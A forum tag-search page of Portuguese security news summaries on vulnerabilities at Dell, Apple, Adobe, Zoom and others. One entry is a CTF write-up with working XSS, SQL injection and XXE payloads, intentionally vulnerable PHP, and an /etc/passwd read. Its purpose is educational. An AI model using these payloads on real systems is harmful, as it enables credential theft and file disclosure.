Jump to content

Search the Community

Showing results for tags 'vulnerabilidade'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Supporter area
    • Tools of the Trade
    • Finance transparency
  • MBConf
    • MBConf v1
    • MBConf v2
    • MBConf v3
  • Mente Binária
    • General
    • Computer Architecture
    • Certifications
    • Quantum computing
    • Cryptography
    • Challenges and CTF
    • Hardware Hacking
    • Electronics
    • Conferences
    • Forensics
    • Games
    • Data privacy and laws
    • Code breaking
    • Networking
    • Pentest
    • Speak to us!
    • Software releases
  • Career
    • Study and profession
    • Jobs
  • Reverse Engineering
    • General
    • Malware Analysis
    • Firmware
    • Linux and UNIX-like
    • Windows
  • Programming
    • Assembly
    • C/C++
    • Python
    • Other languages
  • Operating Systems
    • GNU/Linux and UNIX-like
    • Windows
  • Segurança na Internet's Discussão

Calendars

  • Conferences
  • Call for papers (CFP)

Categories

  • Trainings

Categories

  • Portal Mente Binária
  • Specials

Categories

  • Articles

Categories

  • Contribuindo

Categories

  • Study and Professions Guide

Categories

  • Tech basics
    • Text comprehension
    • English
    • Mathematics
  • Computing Basics
    • Lógica de Programação
    • Computers Architecture
    • Cryptography
    • Data Structures
    • Network
    • Operating Systems
  • Specifics
    • SO Internals
    • Web
    • Python
    • Javascript
    • Infrastructure
    • Go
    • Reverse Engineering
    • DevOps
    • C/C++
    • Log Analysis

Categories

  • Crackmes
  • Documentation
  • Debuggers
  • PE tools
  • Books
  • Util
  • Packers
  • Unpackers
  • Virtual Machines

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


GitHub


Twitter


LinkedIn


Website

  1. Quatro falhas de segurança separadas afetam cerca de 30 milhões de endpoints individuais da Dell em todo o mundo. Segundo o ThreatPost, as vulnerabilidades dariam aos invasores controle e persistência quase completos sobre os dispositivos visados. Os bugs de alta gravidade foram encontrados pelos pesquisadores da Eclypsium, e podem permitir que atacantes remotos obtenham execução arbitrária de código no ambiente de pré-inicialização dos dispositivos Dell. De acordo com uma análise da empresa de segurança, os bugs afetam 129 modelos de laptops, tablets e desktops, incluindo dispositivos corporativos e de consumo, protegidos pelo Secure Boot, padrão de segurança que visa garantir que um dispositivo seja inicializado usando apenas software confiável para o fabricante do equipamento original. As falhas permitem que adversários de rede privilegiados contornem as proteções de inicialização segura, controlem o processo de inicialização do dispositivo e subvertam o sistema operacional e os controles de segurança de camadas superiores, dizem os pesquisadores. Os problemas afetam o recurso BIOSConnect do Dell SupportAssist, uma solução de suporte técnico pré-instalada na maioria das máquinas Dell baseadas em Windows e utilizada para realizar recuperações remotas do sistema operacional ou para atualizar o firmware no dispositivo. O relatório da Eclypsium observou que as vulnerabilidades específicas permitem que um invasor explore remotamente o firmware UEFI de um host e obtenha controle sobre o código mais privilegiado do dispositivo. A primeira vulnerabilidade, CVE-2021-21571, é o início de uma cadeia que pode levar à execução arbitrária de código. As outras três vulnerabilidades distintas e independentes (CVE-2021-21572, CVE-2021-21573, CVE-2021-21574) ajudam os atacantes a obter a execução arbitrária de código no ambiente de pré-inicialização no dispositivo de destino, disseram os pesquisadores.
  2. A Apple corrigiu duas vulnerabilidades 0-Day, aparentemente exploradas ativamente, e que afetavam o motor WebKit do navegador Safari. Segundo o BleepingComputer, as falhas no iOS podem ter sido usadas para invadir dispositivos antigos de iPhone (iPhone 5s, iPhone 6, iPhone 6 Plus), iPads (iPad Air, iPad mini 2, iPad mini 3), e iPod touch 6ª geração. Os dois bugs são causados por corrupção de memória e uso após problemas livres no motor do navegador WebKit, mecanismo de renderização de navegador usado por navegadores e aplicativos da Apple para renderizar conteúdo HTML em plataformas de desktop e móveis, incluindo iOS, macOS, tvOS e iPadOS. Os invasores podem explorar as duas vulnerabilidades usando conteúdo da Internet criado com códigos maliciosos, o que acionaria a execução arbitrária de códigos depois de serem carregados pelos alvos em dispositivos sem patch (correção). A Apple divulgou comunicado sobre as atualizações de segurança, disponibilizadas aqui.
  3. A Apple disponibilizou o macOS Big Sur 11.4, e a recomendação é que os usuários de MacBook façam uma atualização o mais rápido possível. Isso porque um malware que faz capturas de tela secretamente foi detectado explorando uma séria falha na segurança do macOS. A falha pode ser explorada para gravação de vídeo ou acesso a arquivos, tornando a correção mais urgente. A descoberta foi feita pela empresa de segurança cibernética Jamf durante a pesquisa sobre o malware XCSSET, descoberto pela Trend Micro em 2020. "Descobrimos que esse desvio está sendo explorado ativamente durante a análise adicional do malware XCSSET, após notar um aumento significativo de variantes detectadas por aí. A equipe de detecção observou que, uma vez instalado no sistema da vítima, o XCSSET estava usando esse desvio especificamente com o objetivo de tirar capturas de tela da área de trabalho do usuário sem exigir permissões adicionais", diz a empresa. A Jamf destaca que o malware foi escrito em AppleScript, uma linguagem de script desenvolvida pela Apple, facilitando o controle sobre aplicativos Mac. Na maior parte do tempo, o autor do malware aproveita AppleScripts em sua cadeia de ataque devido à facilidade com que lida com muitos comandos bash, até mesmo baixando e/ou executando scripts Python, tentando sempre ofuscar suas intenções usando várias linguagens de script. A empresa traz mais detalhes de como funciona o malware, e alerta para que usuários atualizem seus sistemas, já que a Apple corrigiu recentemente esse problema, evitando que o XCSSET abuse dessa vulnerabilidade no futuro.
  4. O WP Statistics, plug-in do WordPress, tem uma vulnerabilidade de segurança de injeção de SQL que pode permitir que visitantes do site obtenham todos os tipos de informações confidenciais de bancos de dados, incluindo e-mails, dados de cartão de crédito, senhas e mais. Quem descobriu o bug foram os pesquisadores do Wordfence, e um patch já foi lançado para corrigir a falha. Segundo publicação da empresa de segurança, o plug-in já foi instalado em mais de 600 mil sites WordPress. Ele fornece aos proprietários de sites estatísticas detalhadas sobre os visitantes, incluindo quais páginas do site eles visitam. O administrador do site pode acessar o item de menu “Pages” e gerar uma consulta SQL para exibir estatísticas sobre quais páginas receberam mais tráfego. A falha de alta gravidade na função “Pages” abre brecha para que qualquer visitante do site, mesmo sem um login, faça uma consulta SQL. Para usuários com o plug-in instalado em seu site, a Wordfence recomenda a atualização para a versão corrigida 13.0.8 o mais rápido possível.
  5. O pesquisador de segurança Konstantin Darutkin descobriu uma vulnerabilidade que permite que sites rastreiem usuários em vários navegadores de desktop diferentes, incluindo Apple Safari, Google Chrome, Microsoft Edge, Mozilla Firefox e Tor. Ele publicou no FingerprintJS uma explicação sobre como a exploração funciona nos navegadores, destacando que a vulnerabilidade permite que os sites identifiquem usuários de forma confiável em diferentes navegadores de desktop e vinculem suas identidades. A falha utiliza informações sobre aplicativos instalados no computador do usuário para atribuir a ele um identificador exclusivo permanente. Para gerar um identificador de dispositivo de navegador cruzado de 32 bits, um site pode testar uma lista de 32 aplicativos populares e verificar se cada um está instalado ou não. Em média, o processo de identificação leva alguns segundos e funciona em sistemas operacionais de desktop Windows, Mac e Linux. Esse identificador funciona mesmo se o usuário trocar de navegador, usar o modo de navegação anônima ou usar uma VPN. O navegador Tor, por exemplo, conhecido por oferecer proteção de privacidade, é afetado pela vulnerabilidade. Além disso, a vulnerabilidade permite o envio de anúncios direcionados e traça o perfil do usuário sem o seu consentimento. Na publicação, o pesquisador faz uma análise técnica detalhada de como a vulnerabilidade funciona, comparando ainda cada navegador. Ele informa também que relatórios de bug foram enviados a todos os navegadores afetados, incluindo uma demonstração ao vivo e disponibilização de um repositório de código-fonte público no GitHub. "Acreditamos que vulnerabilidades como esta devem ser discutidas abertamente para ajudar os navegadores a corrigi-las o mais rápido possível", destaca.
  6. A Adobe está alertando seus clientes sobre um bug crítico 0-Day explorado ativamente e que afeta seu o Adobe Acrobat PDF Reader. Um patch está disponível junto a outras 43 correções para 12 de seus produtos. A vulnerabilidade sob ataque ativo afeta os sistemas Windows e macOS e podem levar à execução arbitrária de códigos. Segundo o ThreatPost, a vulnerabilidade foi explorada em ataques limitados direcionados a usuários do Adobe Reader no Windows. Os usuários do Windows talvez sejam os únicos atualmente visados, mas o bug afeta outras versões do software. São elas: Windows Acrobat DC e Reader DC (versões 2021.001.20150 e anteriores) macOS Acrobat DC e Reader DC (versões 2021.001.20149 e anteriores) Windows e macOS Acrobat 2020 e Acrobat Reader 2020 (2020.001.30020 e versões anteriores) Windows e macOS Acrobat 2017 e Acrobat Reader 2017 (2017.011.30194 e versões anteriores) Os usuários podem atualizar as instalações de seus produtos manualmente escolhendo Ajuda > Verificar quanto a atualizações. (Crédito da imagem: Wikipedia)
  7. Pesquisadores da SentinelOne descobriram que, desde 2009, vulnerabilidades nos drivers da Dell afetam potencialmente centenas de milhões de máquinas. Os atacantes podem usar os bugs para iniciar uma série de ataques. As cinco falhas de alta gravidade no driver de atualização de firmware da Dell afetam desktops, laptops, notebooks e tablets da fabricante. As descobertas do SentinelLabs foram relatadas à Dell em 1º de dezembro de 2020 e são rastreadas como CVE-2021-21551. A Dell, por sua vez, lançou uma atualização de segurança para seus clientes para resolver a vulnerabilidade. Em publicação no Blog do SentinelLabs, o pesquisador relata o processo de investigação da postura de segurança do módulo de driver de atualização de firmware versão 2.3 (dbutil_2_3.sys). O componente vem pré-instalado na maioria das máquinas Dell que executam o Windows e máquinas Windows recém-instaladas que foram atualizadas. O driver chamou a atenção do pesquisador devido ao uso do Process Hacker, que tem um recurso que exibe uma mensagem de notificação toda vez que um serviço é criado ou excluído. Isso o levou à descoberta dos cinco bugs de alta gravidade que permaneceram ocultos por 12 anos. As falhas de alta gravidade podem permitir que qualquer um aumente privilégios e execute o código no modo kernel. Entre os abusos das vulnerabilidades está o fato de que elas podem ser usadas para contornar produtos de segurança. Um invasor com acesso à rede de uma organização também pode executar código em sistemas Dell sem patch e usar essa vulnerabilidade para obter elevação local de privilégio. (Crédito da imagem: Wikipedia)
  8. Atacantes estavam explorando um bug grave no sistema operacional da Apple, o macOS, conseguindo contornar a maioria dos mecanismos de segurança do sistema. Segundo a Vice, o bug era, até então, desconhecido e foi utilizado para invadir um número não identificado de computadores Mac. O problema foi relatado à Apple em 25 de março, e a empresa já lançou um patch na versão mais recente do MacOS Big Sur, corrigindo a falha. Pesquisadores de segurança que encontraram a vulnerabilidade e a analisaram dizem que a falha permitia que os atacantes criassem um malware que poderia assumir o controle do computador da vítima, contornando as proteções de segurança da Apple no macOS, como Gatekeeper, Quarentena de Arquivos e requisitos de autenticação de aplicativos. Em teoria, esses mecanismos bloqueiam o acesso de arquivos baixados da Internet aos arquivos do usuário, a menos que sejam assinados por desenvolvedores conhecidos e tenham sido verificados pela Apple. Um pesquisador independente especializado em macOS afirmou à Vice que esse é o pior ou potencialmente o mais impactante bug para os usuários diários do macOS. Apesar da vítima em potencial ter que clicar duas vezes em um arquivo malicioso para infectar seu computador, o sistema não mostra nenhum alerta, prompt, nem bloqueia a execução do aplicativo, de acordo com os pesquisadores. Um porta-voz da Apple disse que a empresa implantou regras para detectar malwares que abusam desse bug em seu aplicativo antivírus XProtect. Essas regras são instaladas automaticamente em segundo plano, o que significa que todos os dispositivos macOS, incluindo os que executam versões anteriores, também terão essa proteção.
  9. O AirDrop, recurso que permite que usuários de Mac e iPhone transfiram arquivos sem fio entre dispositivos da Apple, está com uma falha que permite o vazamento de e-mails e números de telefone dos usuários. Segundo o Ars Technica, o AirDrop, que usa Wi-Fi e Bluetooth para estabelecer conexões diretas com dispositivos próximos e transferir fotos, documentos, etc., entre um dispositivo iOS ou macOS para outro, funciona em três modos: um que permite que apenas contatos se conectem, um segundo que permite que qualquer pessoa se conecte, e o terceiro, que não permite nenhuma conexão. Para determinar se o dispositivo de um possível remetente deve se conectar a outros dispositivos próximos, o AirDrop transmite anúncios Bluetooth que contêm um hash criptográfico parcial do número de telefone e endereço de e-mail do remetente. Se qualquer um dos hashes truncados corresponder a qualquer número de telefone ou endereço de e-mail no catálogo de endereços do dispositivo receptor, ou se o dispositivo estiver configurado para receber de qualquer pessoa, os dois dispositivos entrarão em autenticação mútua via Wi-Fi, trocando os hashes SHA-256 completos dos números de telefone e endereços de e-mail dos usuários. O Ars Technica explica que atacantes conseguem descobrir os hashes executando um ataque de força bruta, que lança um grande número de suposições e espera por aquele que gera o hash procurado. Quanto menor a imprevisibilidade ou força no texto não criptografado, mais fácil de adivinhar ou quebrar o hash. "Esta é uma descoberta importante, pois permite que os invasores obtenham informações bastante pessoais dos usuários da Apple que, em etapas posteriores, podem ser abusadas para ataques de spear phishing, golpes, etc. ou simplesmente serem vendidos", diz ao Ars Technica um dos pesquisadores na Universidade Técnica de Darmstadt, na Alemanha, que encontrou as vulnerabilidades, Christian Weinert. Os pesquisadores dizem que notificaram a Apple em particular sobre suas descobertas em maio de 2019. Um ano e meio depois, eles apresentaram o "PrivateDrop", um AirDrop reformulado que desenvolveram e que usa interseção de conjuntos privados, uma técnica criptográfica que permite que as duas partes façam contato sem revelar hashes vulneráveis. A implementação do PrivateDrop está publicamente disponível no GitHub. Segundo o Ars Technica, até o momento, a Apple não indicou se tem planos de adotar o PrivateDrop ou empregar alguma outra forma de corrigir o vazamento.
  10. O Cisco Talos, grupo global de inteligência de ameaças de cibersegurança da Cisco, descobriu uma vulnerabilidade de divulgação de informações no kernel do Linux. A vulnerabilidade, rastreada como CVE-2020-28588, pode permitir que um invasor visualize a pilha de memória do kernel, o que significa que dados ou informações que não deveriam ser vistas possam ser acessadas. O problema foi visto pela primeira vez pelo Cisco Talos em um dispositivo Azure Sphere (versão 20.10), um dispositivo ARM de 32 bits que executa um kernel do Linux corrigido. O kernel do Linux é o núcleo livre e de código aberto dos sistemas operacionais do tipo Unix. A vulnerabilidade existe especificamente na funcionalidade /proc/pid/syscall de dispositivos ARM de 32 bits executando Linux. Um invasor pode explorá-la lendo /proc/<pid>/syscall, um arquivo legítimo do sistema operacional Linux, podendo aproveitar esse vazamento de informações para explorar com êxito vulnerabilidades adicionais não corrigidas. O Cisco Talos trabalhou com o Linux para garantir que esse problema seja resolvido e uma atualização já está disponível para os clientes afetados. Os usuários são incentivados a atualizar esses produtos afetados o mais rápido possível para o Kernel Linux versões 5.10-rc4, 5.4.66 e 5.9.8.
  11. Hoje iremos acompanhar um writeup de um desafio do pwn2win 2020, criado pelo Caio Lüders, que nos permite aprender 3 vulnerabilidades conhecidas (XSS, SQL INJECTION e XXE) e categorizadas no OWASP Top 10 como Injection (top 1) e XXE (top 4). Para isso, vamos entender as vulnerabilidades envolvidas separadamente e depois explorar no desafio. O que é Reflected XSS Cross Site Script Refletido (Reflected XSS) é uma vulnerabilidade que explora a injeção de códigos na resposta HTTP que podem estar refletidos em diferentes contextos HTML e permitem execução de código JavaScript. Código vulnerável: ### Contexto de html <?php $nome = $_GET["nome"]; // Guarda o valor do parametro nome na variavel nome print '<h1>ola ' . $nome .'<h1>'; // Retorna no html <h1> ola $conteudo da variavel nome$ </h1> ?> O código PHP é vulnerável à XSS já que todo o conteúdo passado no parâmetro nome é retornado, sem sanitização, no HTML da página. Ou seja, se conseguimos injetar qualquer tag HTML podemos utilizar alguma tag que execute JavaScript (<script>alert(1)</script>, por exemplo) ou podemos utilizar tags com eventos (<img src=x onerror=alert(1)/>) como uma forma de executar JavaScript. XSS: http://localhost:8000/xsshtml.php?nome=<script>alert(1)</script> http://localhost:8000/xsshtml.php?nome=<img src=imageminvalida onerror=alert(1)> Código vulnerável: ### Contexto de atributo <?php $img = $_GET["img"]; // Pega o valor do parâmetro "img" e guarda dentro da variável "$img" print '<img src="' . $img .'">'; // Retorna no HTML da página <img src="CONTEUDO DA VARIAVEL $img"> ?> Percebemos que o servidor está inserindo o parâmetro img dentro do atributo src da imagem. Uma maneira que podemos transformar isso em um XSS é fechar o atributo e a tag com “> e inicializar outra tag que execute JavaScript, <img src=x onerror=xss>, por exemplo. Outro caminho é injetar outro atributo que execute JavaScript. XSS: http://localhost:8000/xssatributo.php?img="><img src=imageminvalida onerror=alert(1)> http://localhost:8000/xssatributo.php?img=imageminvalida" onerror=alert(1)// Código vulnerável: ### Contexto de códigos JavaScript <?php $nome = $_GET["nome"]; // Pega o valor do parametro "nome" e guarda na variavel $nome print '<body>'; // Adiciona a tag <body> no HTML print '<script>nome=\'' . $nome .'\';console.log(nome)</script>'; // adiciona o <script>nome=COUNTEUDO DA VARIAVEL $nome;console.log(nome)</script> no HTML da pagina print '</body>';// adiciona tag </body> para fechar a tag no html ?> Para explorar o XSS com o payload teste'-alert(1)// fechamos a String nome com ' . Fizemos a operação de subtração para executar o JavaScript e comentamos o código restante com //. XSS: http://localhost:8000/xssjavascript.php?nome='-alert(1)// O que é SQL Injection SQL Injection é uma vulnerabilidade que explora como uma query SQL é montada e enviada para ser executada. Muitas vezes o desenvolvedor utiliza as entradas do usuário diretamente na query que será executada para fazer a consulta SQL sem nenhuma forma de tratamento. Código vulnerável: $usuario = $_POST['usuario']; $senha = $_POST['senha']; $sql = "SELECT * FROM usuarios WHERE usuario = '".$usuario."' AND senha = '".$senha."' "; $processa = mysql_query($sql); Explorando SQL Injection No exemplo abaixo temos uma consulta normal de SQL com as entradas usuais de um usuário : $usuario = "epicleetteam"; $senha = "admin"; Com as entradas acima a consulta SQL resulta no seguinte: SELECT * FROM usuarios WHERE usuario = 'epicleetteam' AND senha = 'admin' Demonstrando agora o que acontece quando enviamos entradas com aspas simples: $usuario = "epicleet'team"; $senha = "admin"; Com as entradas acima a consulta SQL resulta no seguinte: SELECT * FROM usuarios WHERE usuario = 'epicleet'team' AND senha = 'admin' Podemos notar que a aspa simples quebra a query e nos permite escapar da string e gerar um erro de sintaxe. Como escapamos da string conseguimos executar qualquer comando SQL. Exemplo executando o comando sleep para evitar o erro de sintaxe utilizamos o # para comentar o resto da query: $usuario = "epicleetteam' union select sleep(5)#"; $senha = "admin"; SELECT * FROM usuarios WHERE usuario = 'epicleet' union select sleep(5)#' AND senha = 'admin' O que é XXE XML External Entity (XXE) é uma característica do XML que nos permite criar uma referencia de um dado. Esse dado pode ser local ou remoto. Com isto a entidade passa a ter o valor contido no endereço referenciado e ao ser chamada retorna os dados desse endereço. Exemplo com arquivo local: <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> Saída: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin messagebus:x:101:101::/nonexistent:/usr/sbin/nologin gnx:x:999:999::/home/gnx:/bin/sh Exemplo com arquivo externo: <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "https://epicleet.team/robots.txt" >]><foo>&xxe;</foo> Vamos ao desafio A ideia do desafio era explorar todas essas vulnerabilidades em uma única requisição. Sendo assim, a sua requisição precisa ser poliglota (ser entendida em diferentes contextos) e evitar com que uma exploração não atrapalhe a outra. Para começar escolhemos o SQL Injection. Para elaboração do payload separamos a resolução em 3 partes: SQLi, XXE e por fim XSS+XXE+SQLi. Código Fonte do desafio: https://github.com/pwn2winctf/challenges-2020/blob/master/web-A payload to rule them all/deploy/server/script/test_payload.js SQL Injection Os trechos destacados são responsáveis pela vulnerabilidade de SQL Injection e por validar caso ele tenha obtido sucesso. Depois disso, o desafio avalia se a saída da consulta do SQL possui a password do usuário. OBS: ${payload} é a entrada do atacante. Trecho do desafio vulnerável a SQL Injection: const sqli = await query(`SELECT * from posts where id='${payload}'`) //<- monta a query enviada para o sql await connection.end() return JSON.stringify(sqli).includes(users[0]["password"]) //<- Verifica se password esta no retorno da query Para retornar o conteúdo do password na query do SQL utilizamos o operador UNION. O operador union combina os resultados de duas ou mais queries em um único resultado, retornando todas as linhas pertencentes a todas as queries envolvidas na execução. Para utilizar o UNION, o número de colunas precisa ser idêntico em todas as queries. Sendo assim, começaremos descobrindo o número de colunas pela técnica baseada no tempo. Iremos variar a quantidade de colunas utilizando N vezes a palavra null e o comando sleep(5) para criar o delay. Desta forma verificaremos se a resposta foi impactada pelo delay (deu certo) ou não (deu errado): 'UNION SELECT sleep(5)# (não demorou) 'UNION SELECT sleep(5),null# (não demorou) 'UNION SELECT sleep(5),null,null#(demorou) Para confirmar que são exatamente 3 colunas adicionamos mais uma coluna e se não demorar garantimos a quantidade 3 de colunas 'UNION SELECT sleep(5),null,null,null# (não demorou)` Sendo assim, ao obter o numero de colunas correto podemos retornar o conteudo da senha com esse payload final 'UNION SELECT null,null,(select password from users)# E assim fica a query executada pelo SQL: SELECT * from posts where id=''UNION SELECT null,null,(select password from users)#' XXE Trecho do desafio vulnerável a XXE: var my_secret = Math.random().toString(36).substring(2) ;//<- Gera numero aleatorio fs.writeFileSync("/home/gnx/script/xxe_secret",my_secret) //<- Escreve esse numero aleatorio no arquivo xxe_secret var doc = libxml.parseXml(payload, { noent: true ,nonet: true })// <- recebe as entradas do atacante e parseia o xml return doc.toString().includes(my_secret) //<- verifica se o conteúdo do arquivo my_secret aparece no retorno do xml Para o ataque de XXE somente utilizei o payload conhecido de leitura de arquivo <?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///home/gnx/script/xxe_secret’>]><root>&test;</root> Porém para não atrapalhar o SQL Injection substituímos as aspas simples por aspas duplas. Assim ficamos com um payload poliglota que explora XXE e SQLi. Payload de XXE+SQLI: <?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM "file:///home/gnx/script/xxe_secret">]><root>&test;</root>'UNION SELECT null,null,(select password from users)# XSS+XXE+SQLI A parte do XSS, supostamente mais simples, já que seria só definir a variável xss com o payload "xss=1", tornou-se a mais complicada pois era afetada pelos outros payloads, que acarretavam erros de sintaxe JavaScript. Trecho do código vulnerável: payload = sanitizeHtml(payload,{allowedTags:[]}) // <- Recebe a entrada do usuario e sanitiza com a funcao sanitizeHtml await page.goto(`data:text/html,<script>${payload}</script>`) // <- Coloca o conteudo sanitizado dentro da tag <script> const check = await page.evaluate("( typeof xss != 'undefined' ? true : false )") //<- verifica se a variavel xss esta definido Como todo o payload era passado em uma lib de sanitização antes de ser injetado no browser (data:text/html,<script>${payload}</script>), deveríamos utilizar essa lib ao nosso favor para forçar a remoção do conteúdo dos outros ataques que atrapalham criar um JavaScript válido. Uma das remoções da lib é a de comentários. A lib também remove todas as tags HTML. Sabendo disso, vamos usar essas características e juntar as vulnerabilidades. Exemplo: <tag aleatoria> é removido <!--é removido --> Remover o SQLl Injection do payload de XSS é bem fácil já que podemos injetar qualquer conteúdo antes das aspas simples precisando somente ser diferente de aspas simples e injetar qualquer conteúdo depois do comentário. SQL Injection com comentários do HTML: <!--’UNION SELECT (select password from users),null,null#--> Payload invalido com Sql Injection + XXE + XSS: <?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM "file:///home/gnx/script/xxe_secret">]><root>xss=1//&test;</root><!--'UNION SELECT null,null,(select password from users)#--> A lib sanitizehtml, ao interpretar boa parte do conteudo xml como tag html, remove a maior parte da string. Partes restantes do payload depois do sanitize: ]>xss=1//&test; Erro ao acessar data:text/html,<script>]>xss=1//&test;</script>: Uncaught SyntaxError: Unexpected token ']' Percebemos que o conteúdo do xml estava atrapalhando o código JavaScript ao ser executado sem erros no browser. Para escapar criamos uma entidade <!ENTITY apagar SYSTEM "teste>/*"> com o conteúdo teste> para a lib remover algumas partes do xml. No entanto restaram alguns caracteres que estavam gerando o erro de sintaxe comentado anteriormente.Para isso utilizamos o comentário do JavaScript /* */ para comentar os caracteres “]> e o // para comentar todo o resto do payload. Payload Final usando comentário javascript: <!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///home/gnx/script/xxe_secret"><!ENTITY apagar SYSTEM "teste>/*">]><root>*/xss=1//&xxe;</root><!--' union select (select password from users),null,null Outra maneira era utilizar o CDATA para injetar esses caracteres especiais < e colocar o xss dentro de uma entidade do xml. O CDATA é importante pois na ausência do CDATA eles seriam interpretados pelo xml parser e teríamos problemas com o xxe. Payload Final <!DOCTYPE root [<!ENTITY test SYSTEM "file:///home/gnx/script/xxe_secret"><!ENTITY x "<![CDATA[ < ]]>xss=1//" >]><root>&test;</root><!--' union select (select password from users),null,null#-->
  12. Um pesquisador de segurança encontrou um bug "crítico" no mecanismo de jogo da desenvolvedora de jogos Valve, que alimenta, entre outros jogos, o Counter Strike. Segundo reportagem da Vice, a partir dessa falha, atacantes poderiam assumir o controle dos computadores das vítimas apenas enganando-as para que cliquem em um convite do software de gestão Steam. O pesquisador diz ter alertado a Valve sobre a falha em junho de 2019. Embora o bug tenha sido corrigido em alguns jogos que usam o motor Source, ele ainda está presente no Counter Strike: Global Offensive. Outro pesquisador também encontrou o mesmo bug meses depois. Por meio dessa falha, atacantes poderiam espalhá-la automaticamente, quase como um worm. Ou seja, depois de infectar alguém, a pessoa pode ser transformada em "arma" para infectar seus amigos e assim por diante.
  13. Um pesquisador encontrou uma falha no Editor de Texto, aplicativo de edição de texto pré-instalado em Macs, que poderia revelar o endereço IP do usuário a um hacker. Segundo a Vice, o bug, que já foi corrigido pela Apple, potencialmente permitia que um atacante enganasse o Mac de uma vítima para revelar seu endereço IP apenas baixando um arquivo .txt e abrindo-o com o Editor de Texto. A falha fazia com que o aplicativo analisasse e interpretasse automaticamente o código HTML. Para acionar essa vulnerabilidade, o atacante teria que inserir algum código HTML malicioso no arquivo de texto para fazer o Editor de Texto acessar um servidor remoto controlado pelo atacante. O pesquisador disse também que o bug encontrado poderia ter sido usado junto com outras falhas para causar muito mais danos do que apenas revelar o endereço IP da vítima, podendo inclusive assumir o controle da máquina da vítima. Ele revelou ainda que o Editor de Texto tinha recursos como chamar para outros arquivos e pastas locais no disco rígido e até fazer uma solicitação para um servidor remoto, podendo fazer com que um atacante tirasse proveito desses recursos com algum código HTML escondido em um arquivo de texto aparentemente inocente. Além disso, o sistema de proteção contra malware da Apple basicamente tratava todos os arquivos .txt baixados como seguros. Para evitar ser afetado por este bug basta manter o sistema macOS atualizado, mas o pesquisador afirma que possivelmente existem outras falhas no Editor de Texto que estão sendo analisadas e serão relatadas à Apple.
  14. Uma vulnerabilidade que afeta VPNs da Fortinet está sendo explorada por uma nova cepa de ransomware operada por humanos, o Cring, que viola e criptografa redes de empresas do setor industrial. De acordo com o BleepingComputer, o ransomware Cring, também conhecido como Crypt3r, Vjiszy1lo, Ghost e Phantom, foi descoberto em janeiro e detectado pela equipe CSIRT do provedor de telecomunicações suíço Swisscom. Relatório da Kaspersky revelou que os invasores têm explorado servidores Fortigate SSL VPN expostos à Internet e não corrigidos contra a vulnerabilidade CVE-2018-13379, permitindo a violação da rede de seus alvos. A partir do dispositivo Fortinet VPN, os operadores Cring movem-se lateralmente na rede corporativa de destino, roubando credenciais de usuário do Windows, usando Mimikatz para obter o controle da conta do administrador de domínio. As cargas úteis do ransomware são entregues aos dispositivos nas redes das vítimas usando a estrutura de emulação de ameaças Cobalt Strike implantada por meio de um script PowerShell malicioso. O ransomware criptografa apenas arquivos específicos nos dispositivos comprometidos usando algoritmos de criptografia robustos após remover os arquivos de backup e eliminar os processos do Microsoft Office e do Oracle Database. Em seguida, ele envia notas de resgate avisando as vítimas de que sua rede foi criptografada e que elas precisam pagar o resgate. As vítimas têm usado o serviço ID-Ransomware para verificar se seus sistemas foram atingidos pelo ransomware Cring desde que a operação apareceu pela primeira vez, em dezembro de 2020. Desde o final de janeiro, 30 amostras de ransomware Cring foram enviadas até o momento, diz o BleepingComputer.
  15. Uma falha no recurso de compartilhamento de tela do Zoom pode mostrar partes das telas que os apresentadores não pretendiam compartilhar. A falha de segurança CVE-2021-28133 foi encontrada na versão 5.5.4 da plataforma, segundo o ThreatPost, e pode vazar inadvertidamente os dados dos usuários para outros participantes da reunião. Segundo a publicação, por ser uma execução rápida, um ataque potencial é mais difícil de ser executado. O compartilhamento de tela da plataforma de videoconferência Zoom permite que os usuários compartilhem o conteúdo de suas telas com outros participantes em uma reunião optando por compartilhar sua tela inteira, uma ou mais janelas de aplicativos ou apenas uma área selecionada de sua tela. No entanto, "sob certas condições", se um apresentador do Zoom escolher compartilhar uma janela do aplicativo, o recurso de compartilhamento de tela transmite brevemente o conteúdo de outras janelas do aplicativo para os participantes da reunião. O problema ocorre quando um usuário compartilha uma janela dividida do aplicativo (como slides de apresentação em um navegador da Internet) e, ao abrir outros aplicativos em segundo plano, que deveria estar modo não compartilhado, o conteúdo da janela pode ser percebido por um “breve momento” pelos participantes da reunião. O risco acontece principalmente se a reunião estiver sendo gravada e a parte visualizada apresentar dados sensíveis. O ThreatPost informa que seria difícil explorar o bug intencionalmente, pois o invasor precisaria ser um participante de uma reunião em que dados vazassem inadvertidamente, portanto a falha é considerada de gravidade média na escala CVSS. A vulnerabilidade foi relatada por pesquisadores da SySS ao Zoom em 2 de dezembro. O ThreatPost afirma que entrou em contato com o Zoom para mais comentários sobre a falha e se ela será corrigida no próximo lançamento, 